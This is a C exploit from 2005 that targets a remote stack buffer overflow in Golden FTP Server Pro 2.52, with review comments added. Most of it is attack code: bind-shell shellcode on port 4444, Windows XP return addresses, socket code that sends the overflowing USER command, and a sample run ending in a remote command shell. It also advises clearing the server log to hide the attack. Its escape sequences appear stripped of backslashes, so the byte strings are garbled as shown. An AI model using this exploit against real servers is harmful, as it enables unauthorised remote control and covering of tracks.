
# Title : Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (2nd)
# Published : 2005-04-29
# Author : c0d3r
# Previous Title : Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit
# Next Title : Golden FTP Server Pro 2.52 Remote Buffer Overflow Exploit (3rd)


/*
   Golden FTP Server Pro remote stack BOF exploit
   author : c0d3r "kaveh razavi" c0d3rz_team@yahoo.com c0d3r@ihsteam.com
   risk : highly critical
   vendor status : no patch released , all targets are vuln 
   package : golden-ftp-server-pro 2.5.0.0 and prior
   advisory :  http://secunia.com/advisories/15156/
   vendor address : www.goldenftpserver.com
   timeline :
   28 Apr 2005 : Public Disclosure
   29 Apr 2005 : IHS exploit released , winxpsp1 & winxpsp2 target
   after running the exploit u need to restart the server after that 
   the server will be closed automatically then u will have a shell
   on port 4444 . if u want to erase the crap just clean the GFTPpro.log
   manually as mentioned in the advisory .
   workaround : upgrade to newer version or use another FTP server . 
   compiled with visual c++ 6 : cl golden-ftp.c
   greetz : IHSTeam members,exploit-dev mates,securiteam,str0ke-milw0rm
   (C) IHS security 2005
*/

/*
D:\projects>golden-ftp 127.0.0.1 21 0

-------- Golden FTP Server Pro remote stack BOF exploit by c0d3r

[+] building overflow string
[+] attacking host 127.0.0.1
[+] packet size = 755 byte
[+] connected
[+] sending the overflow string
[+] exploit sent successfully !
[+] restart the Ftp server then nc 127.0.0.1 4444


D:\projects>nc -vv 127.0.0.1 4444
DNS fwd/rev mismatch: localhost != kaveh
localhost [127.0.0.1] 4444 (?) open
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Golden FTP Server Pro>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "ws2_32.lib")
#define NOP 0x90
#define size 755   // total length of the overflow string; also the element count of buffer[] below

// Layout of buffer[] as assembled in main() (offsets taken from the memcpy calls there):
//   [0..4]     5 byte user command (hex1)
//   [5..336]   332 byte NOP junk
//   [337..340] 4 byte return address (winxpsp1 / winxpsp2, selected by argv[3])
//   [341..355] 15 byte NOP
//   [356..754] 399 byte shellcode
//   5 + 332 + 4 + 15 + 399 = 755 = size

// using metasploit great shellcode LPORT=4444 Size=399
// (the header and the sample run above expect a shell reachable on the target's TCP port 4444 afterwards)

unsigned char shellcode[] =
"xd9xeexd9x74x24xf4x5bx31xc9xb1x5ex81x73x17x4fx85"
"x2fx98x83xebxfcxe2xf4xb3x6dx79x98x4fx85x7cxcdx19"
"xd2xa4xf4x6bx9dxa4xddx73x0ex7bx9dx37x84xc5x13x05"
"x9dxa4xc2x6fx84xc4x7bx7dxccxa4xacxc4x84xc1xa9xb0"
"x79x1ex58xe3xbdxcfxecx48x44xe0x95x4ex42xc4x6ax74"
"xf9x0bx8cx3ax64xa4xc2x6bx84xc4xfexc4x89x64x13x15"
"x99x2ex73xc4x81xa4x99xa7x6ex2dxa9x8fxdax71xc5x14"
"x47x27x98x11xefx1fxc1x2bx0ex36x13x14x89xa4xc3x53"
"x0ex34x13x14x8dx7cxf0xc1xcbx21x74xb0x53xa6x5fxce"
"x69x2fx99x4fx85x78xcex1cx0cxcax70x68x85x2fx98xdf"
"x84x2fx98xf9x9cx37x7fxebx9cx5fx71xaaxccxa9xd1xeb"
"x9fx5fx5fxebx28x01x71x96x8cxdax35x84x68xd3xa3x18"
"xd6x1dxc7x7cxb7x2fxc3xc2xcex0fxc9xb0x52xa6x47xc6"
"x46xa2xedx5bxefx28xc1x1exd6xd0xacxc0x7ax7ax9cx16"
"x0cx2bx16xadx77x04xbfx1bx7ax18x67x1axb5x1ex58x1f"
"xd5x7fxc8x0fxd5x6fxc8xb0xd0x03x11x88xb4xf4xcbx1c"
"xedx2dx98x5exd9xa6x78x25x95x7fxcfxb0xd0x0bxcbx18"
"x7ax7axb0x1cxd1x78x67x1axa5xa6x5fx27xc6x62xdcx4f"
"x0cxccx1fxb5xb4xefx15x33xa1x83xf2x5axdcxdcx33xc8"
"x7fxacx74x1bx43x6bxbcx5fxc1x49x5fx0bxa1x13x99x4e"
"x0cx53xbcx07x0cx53xbcx03x0cx53xbcx1fx08x6bxbcx5f"
"xd1x7fxc9x1exd4x6exc9x06xd4x7excbx1ex7ax5ax98x27"
"xf7xd1x2bx59x7ax7ax9cxb0x55xa6x7exb0xf0x2fxf0xe2"
"x5cx2ax56xb0xd0x2bx11x8cxefxd0x67x79x7axfcx67x3a"
"x85x47x68xc5x81x70x67x1ax81x1ex43x1cx7axffx98";
  
  
  // File-scope state used by main(); all of it is zero-initialized by virtue of static storage.
  unsigned int rc,rc2,sock,os,addr ;   // connect()/recv() results, socket handle, target index, fallback IPv4 address
  struct sockaddr_in tcp;              // destination; sin_zero stays clear because the object is file scope
  struct hostent *hp;                  // gethostbyname() result, NULL when argv[1] is not a resolvable name
  WSADATA wsaData;
  unsigned char *recvbuf;              // 256-byte malloc'd scratch buffer for server replies (contents never inspected)
  char buffer[size];                   // the overflow string; see the layout comment above
  char jmp_esp[5];                     // 4-byte return address + NUL, filled by strcat() in main()
  unsigned short port;
  char hex1[] = "x75x73x65x72x20";                  // intended bytes 0x75 0x73 0x65 0x72 0x20 = "user " (FTP USER prefix, offset 0)
  char hex2[] = "x70x61x73x73x20x61x61x61x61";      // intended bytes = "pass aaaa"; sent as the second line in main()
  char hex3[] = "x5Cx6E";                           // intended bytes 0x5C 0x6E; not referenced anywhere in main()
  char winxpsp1[] = "x57x94xAEx77"; // shell32.dll :D   -- return address used for target 0
  char winxpsp2[] = "xEDx1Ex94x7C"; // not tested       -- return address used for target 1
  
 /*
  * main: assembles the 755-byte overflow string described above, connects to
  * argv[1]:argv[2], sends it as the FTP USER line and then a PASS line.
  * argv[3] selects which 4-byte return address (winxpsp1 / winxpsp2) is
  * written at offset 337. exit(-1) on usage, unknown target, WSAStartup,
  * name-resolution or socket errors; otherwise main falls off its end
  * without a return statement.
  *
  * Defender's notes: on the wire this is a USER command whose argument is
  * ~750 bytes padded with 0x90, followed by "pass aaaa"; the header says the
  * attempt is also recorded in GFTPpro.log. Mitigation per the header:
  * upgrade or use another FTP server.
  */
 int main (int argc, char *argv[]){
  
 
  // NOTE(review): argv[3] is read below, so this guard should require argc >= 4;
  // with exactly three arguments argv[3] is the terminating NULL of argv.
  if(argc < 3) {
 printf("n-------- Golden FTP Server Pro remote stack BOF exploit by c0d3rn");
 printf("-------- usage : golden-ftp.exe host port targetn");
 printf("-------- target 1 : windows xp service pack 1 : 0n");
 printf("-------- target 2 : windows xp service pack 2 : 1n");
 printf("-------- eg : golden-ftp.exe 127.0.0.1 80 0nn");
 exit(-1) ;
  }
  printf("n-------- Golden FTP Server Pro remote stack BOF exploit by c0d3rnn");
  // target index; atoi() gives no error indication, non-numeric input becomes target 0
 os = (unsigned short)atoi(argv[3]);
  switch(os)
  {
   case 0:
    // jmp_esp is file scope (zero-initialized), so strcat() appends to an empty string
    strcat(jmp_esp,winxpsp1);
    break;
   case 1:
    strcat(jmp_esp,winxpsp2); // wasnt checked
    break;
   default:
    printf("n[-] this target doesnt exist in the listnn");
    
    exit(-1);
  }

    // Creating heart of exploit code
  
    printf("[+] building overflow string");
  
    // fill everything with NOP, then overlay the three fixed pieces at the
    // offsets from the layout comment: 0 (user prefix), 337 (return address), 356 (shellcode)
    memset(buffer,NOP,size);
    memcpy(buffer,hex1,sizeof(hex1)-1);
    memcpy(buffer+337,jmp_esp,sizeof(jmp_esp)-1);
    memcpy(buffer+356,shellcode,sizeof(shellcode)-1);
    // NOTE(review): buffer has `size` elements, so buffer[size] is one past the
    // end of the array; the terminator that strlen(buffer) later depends on is
    // written outside buffer[].
    buffer[size] = 0;
 
    // EO heart of exploit code

   // NOTE(review): malloc() result is not checked and recvbuf is never freed
   recvbuf = malloc(256);
   memset(recvbuf,0,256);
   
   if (WSAStartup(MAKEWORD(2,1),&wsaData) != 0){
   printf("[-] WSAStartup failed !n");
   exit(-1);
  }
  // resolve argv[1] as a host name first, fall back to dotted-quad parsing
 hp = gethostbyname(argv[1]);
  if (!hp){
   addr = inet_addr(argv[1]);
  }
  // addr is only assigned on the fallback path, so this check only matters when hp is NULL
  if ((!hp) && (addr == INADDR_NONE) ){
   printf("[-] unable to resolve %sn",argv[1]);
   exit(-1);
  }
  sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
  // NOTE(review): Winsock reports failure as INVALID_SOCKET (all bits set), not 0,
  // so this test never detects a failed socket() call.
  if (!sock){
   printf("[-] socket() error...n");
   exit(-1);
  }
   if (hp != NULL)
   memcpy(&(tcp.sin_addr),hp->h_addr,hp->h_length);
  else
   tcp.sin_addr.s_addr = addr;

  if (hp)
   tcp.sin_family = hp->h_addrtype;
  else
  tcp.sin_family = AF_INET;
  // port from argv[2]; atoi() again gives no error indication
  port=atoi(argv[2]);
  tcp.sin_port=htons(port);
   
  
  printf("n[+] attacking host %sn" , argv[1]) ;
  
  
  
  // NOTE(review): %d with a size_t argument; sizeof(buffer) is 755 because `size` is a macro
  printf("[+] packet size = %d byten" , sizeof(buffer));
  
  rc=connect(sock, (struct sockaddr *) &tcp, sizeof (struct sockaddr_in));
  if(rc==0)
  {
    
     Sleep(1000) ;
  printf("[+] connectedn") ;
  printf("[+] sending the overflow stringn") ;
  // read the server banner; the reply itself is never examined and rc2 is never checked
  rc2=recv(sock,recvbuf,256,0);
  Sleep(1000);
  // strlen(buffer) relies on the payload containing no 0x00 byte before the terminator
  send(sock,buffer,strlen(buffer),0);
  send(sock,"n",1,0);
  rc2=recv(sock,recvbuf,256,0);
  Sleep(1000);
  // second line: the "pass aaaa" bytes from hex2
  send(sock,hex2,strlen(hex2),0);
  send(sock,"n",1,0);
  printf("[+] exploit sent successfully !n");
  printf("[+] restart the Ftp server then nc %s 4444nn",argv[1]);
  
  }
  
  else {
      printf("[-] ouch! Server is not listening .... nn");
 }
  // 1 is SD_SEND: stop sending, then release the socket; recvbuf and WSACleanup() are left undone
  shutdown(sock,1);
  closesocket(sock);
  }
  // EO exploit code

// www.Syue.com [2005-04-29]